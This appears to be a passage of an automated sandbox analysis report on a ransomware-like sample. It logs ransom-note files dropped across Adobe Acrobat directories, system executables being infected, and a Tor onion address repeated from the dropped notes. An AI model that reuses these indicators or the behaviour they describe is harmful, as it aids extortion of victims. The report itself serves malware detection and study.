Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: 2b7cu0KwZl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etlJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Jump to behavior

Networking

barindex
Found Tor onion address
Source: RECOVERY INFO.txt62.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt283.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt37.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt10.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt196.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt304.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt153.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt89.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt257.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt155.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt56.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt52.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt275.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt115.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt253.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt106.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt17.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt111.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt46.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt66.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
